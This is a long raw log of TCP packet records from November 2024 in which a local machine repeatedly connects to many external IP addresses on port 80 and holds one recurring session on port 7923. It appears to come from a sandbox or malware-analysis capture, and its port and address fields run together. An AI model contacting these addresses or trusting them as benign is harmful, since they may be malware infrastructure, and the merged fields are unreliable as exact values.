                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.278045893 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.284112930 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.287832022 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.287925005 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.287925005 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.294775009 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.294785023 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.348206043 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.348436117 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.354955912 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.355027914 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.363513947 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.369771957 CET8056289172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.369904041 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.369999886 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.370074034 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.375955105 CET8056289172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.376091003 CET8056289172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.674455881 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.679275990 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.944061995 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.944899082 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.945061922 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.946613073 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.950758934 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.951482058 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.951546907 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.961390018 CET5629080192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.966713905 CET805629018.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.967911959 CET5629080192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.967936039 CET5629080192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.968014956 CET5629080192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.972893953 CET805629018.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.972918987 CET805629018.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.042064905 CET8056289172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.042150021 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.042223930 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.045773983 CET5629180192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.047127962 CET8056289172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.050760031 CET8056291172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.050869942 CET5629180192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.051040888 CET5629180192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.051067114 CET5629180192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.055870056 CET8056291172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.055903912 CET8056291172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.715725899 CET8056291172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.715809107 CET5629180192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.715874910 CET5629180192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.720823050 CET8056291172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.730062008 CET5629280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.735246897 CET805629234.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.735539913 CET5629280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.735681057 CET5629280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.735707998 CET5629280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.741262913 CET805629234.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.741281986 CET805629234.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.205693007 CET5629280192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.207762003 CET5629380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.212584972 CET805629334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.212677956 CET5629380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.212910891 CET5629380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.213059902 CET5629380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.217854977 CET805629334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.217874050 CET805629334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.402415991 CET805629018.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.402653933 CET5629080192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.407989979 CET805629018.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.408072948 CET5629080192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.425411940 CET5629480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.431334972 CET805629418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.431485891 CET5629480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.431592941 CET5629480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.431592941 CET5629480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.436362028 CET805629418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.436372042 CET805629418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.207853079 CET805629334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.208058119 CET5629380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.214257002 CET805629334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.214322090 CET5629380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.223706007 CET5629580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.228703022 CET805629518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.228773117 CET5629580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.228905916 CET5629580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.228924990 CET5629580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.234802008 CET805629518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.234961987 CET805629518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.256597996 CET805629418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.256783962 CET5629480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.262465000 CET805629418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.262543917 CET5629480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.273875952 CET5629680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.278829098 CET805629618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.278893948 CET5629680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.279038906 CET5629680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.279088020 CET5629680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.285356998 CET805629618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.285368919 CET805629618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.930711031 CET805629618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.931941032 CET5629680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.937155962 CET805629618.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.937237024 CET5629680192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.135747910 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.140739918 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.140939951 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.141118050 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.141118050 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.145915031 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.145926952 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.935409069 CET805629518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.935781002 CET5629580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.941450119 CET805629518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.941495895 CET5629580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.951224089 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.956178904 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.956268072 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.956433058 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.956440926 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.961285114 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.961321115 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.159024954 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.164196014 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.429742098 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.431916952 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.436897993 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.575150967 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.575306892 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.580483913 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.580542088 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.586884975 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.589346886 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.589397907 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.591564894 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.594326019 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.594341040 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.596549034 CET805629913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.596617937 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.596762896 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.596853971 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.601681948 CET805629913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.601696014 CET805629913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.732528925 CET8056298208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.747543097 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.752549887 CET805630013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.752644062 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.752856016 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.752881050 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.757761955 CET805630013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.757776022 CET805630013.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.783629894 CET5629880192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.206969023 CET5630080192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.208596945 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.213506937 CET805630113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.213668108 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.213752985 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.213876963 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.218518972 CET805630113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.218614101 CET805630113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.799688101 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.799741030 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.805432081 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.805496931 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.805974007 CET8056279208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:59.806081057 CET5627980192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.046096087 CET805629913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.046240091 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.051580906 CET805629913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.051654100 CET5629980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.060431957 CET5630280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.065962076 CET805630234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.066042900 CET5630280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.066165924 CET5630280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.066201925 CET5630280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.071701050 CET805630234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.071711063 CET805630234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.683743954 CET805630113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.683908939 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.689809084 CET805630113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.689874887 CET5630180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.700439930 CET5630380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.705492973 CET805630344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.705544949 CET5630380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.705872059 CET5630380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.705929995 CET5630380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.710666895 CET805630344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.710769892 CET805630344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.902554035 CET805630234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.905996084 CET5630280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.912362099 CET805630234.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.913871050 CET5630280192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.930227995 CET5630480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.935127020 CET805630447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.935203075 CET5630480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.935410023 CET5630480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.935422897 CET5630480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.941401005 CET805630447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.941412926 CET805630447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.359051943 CET805630344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.359319925 CET5630380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.364372015 CET805630344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.364455938 CET5630380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.375745058 CET5630580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.380693913 CET805630554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.380819082 CET5630580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.381102085 CET5630580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.381102085 CET5630580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.385924101 CET805630554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.385932922 CET805630554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.210328102 CET805630554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.210474968 CET5630580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.215986013 CET805630554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.216036081 CET5630580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.224982977 CET5630680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.229944944 CET805630635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.230000019 CET5630680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.230144024 CET5630680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.230182886 CET5630680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.234896898 CET805630635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.235011101 CET805630635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.429435968 CET805630447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.429573059 CET5630480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.434788942 CET805630447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.434843063 CET5630480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.444108963 CET5630780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.448946953 CET805630713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.449007034 CET5630780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.449182034 CET5630780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.449182034 CET5630780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.454015017 CET805630713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.454025030 CET805630713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.082387924 CET805630635.164.78.200192.168.2.8
